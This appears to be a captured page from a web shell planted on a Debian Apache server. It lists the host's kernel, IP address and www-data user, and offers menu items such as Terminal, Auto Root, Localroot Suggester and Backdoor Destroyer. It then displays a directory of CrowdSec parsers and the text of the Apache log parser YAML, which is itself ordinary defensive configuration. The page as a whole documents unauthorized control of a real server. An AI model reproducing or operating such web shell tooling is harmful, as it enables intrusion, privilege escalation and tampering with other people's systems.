Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
crowdsec /
parsers /
s01-parse /
Delete
Unzip
Name
Size
Permission
Date
Action
apache2-logs.yaml
3.32
KB
-rw-r--r--
2024-10-04 14:15
mysql-logs.yaml
787
B
-rw-r--r--
2024-03-12 23:06
sshd-logs.yaml
4.83
KB
-rw-r--r--
2024-10-04 14:15
Save
Rename
#Apache access/errors logs #debug: true filter: "evt.Parsed.program startsWith 'apache2'" onsuccess: next_stage name: crowdsecurity/apache2-logs description: "Parse Apache2 access and error logs" #log line can be prefixed by a target_fqdn nodes: - grok: pattern: '(%{IPORHOST:target_fqdn}(:%{INT:port})? )?%{COMMONAPACHELOG}( "%{NOTDQUOTE:referrer}" "%{NOTDQUOTE:http_user_agent}")?' apply_on: message # these ones apply for both grok patterns statics: - meta: log_type value: http_access-log - target: evt.StrTime expression: evt.Parsed.timestamp - meta: service value: http - meta: source_ip expression: evt.Parsed.clientip - meta: http_status expression: evt.Parsed.response - meta: http_path expression: "evt.Parsed.request != '' ? evt.Parsed.request : evt.Parsed.rawrequest" - meta: http_verb expression: "evt.Parsed.verb" - meta: http_user_agent expression: "evt.Parsed.http_user_agent" - meta: target_fqdn expression: "evt.Parsed.target_fqdn" onsuccess: next_stage - grok: pattern: '%{HTTPD_ERRORLOG}' apply_on: message onsuccess: next_stage pattern_syntax: NOT_DOUBLE_POINT: '[^:]+' NOT_DOUBLE_QUOTE: '[^"]+' nodes: - filter: "evt.Parsed.module == 'auth_basic'" onsuccess: next_stage pattern_syntax: EXTRACT_USER_AND_PATH: 'user %{NOT_DOUBLE_POINT:username}: authentication failure for "%{NOT_DOUBLE_QUOTE:target_uri}": Password Mismatch' EXTRACT_USER_AND_PATH2: 'user %{NOT_DOUBLE_POINT:username} not found: "?%{NOT_DOUBLE_QUOTE:target_uri}"?' grok: pattern: '%{EXTRACT_USER_AND_PATH}|%{EXTRACT_USER_AND_PATH2}' apply_on: message # these ones apply for both grok patterns statics: - meta: username expression: evt.Parsed.username - meta: http_path expression: evt.Parsed.target_uri - meta: sub_type value: "auth_fail" - filter: "evt.Parsed.module == 'core' && evt.Parsed.message contains 'Invalid URI'" onsuccess: next_stage pattern_syntax: EXTRACT_URIVERB: 'Invalid URI in request %{WORD:verb} %{NOTSPACE:request}(?: HTTP/%{NUMBER:httpversion})' grok: pattern: '%{EXTRACT_URIVERB}' apply_on: message statics: - meta: http_path expression: evt.Parsed.request - meta: sub_type value: "invalid_uri" - filter: "evt.Parsed.module == 'authz_core' && evt.Parsed.message contains 'client denied'" onsuccess: next_stage pattern_syntax: EXTRACT_PATH: 'client denied by server configuration: %{GREEDYDATA:target_uri}' grok: pattern: '%{EXTRACT_PATH}' apply_on: message statics: - meta: http_path expression: evt.Parsed.target_uri - meta: sub_type value: "permission_denied" statics: - meta: log_type value: http_error-log - target: evt.StrTime expression: evt.Parsed.timestamp - meta: service value: http - meta: source_ip expression: evt.Parsed.client - meta: http_status expression: evt.Parsed.response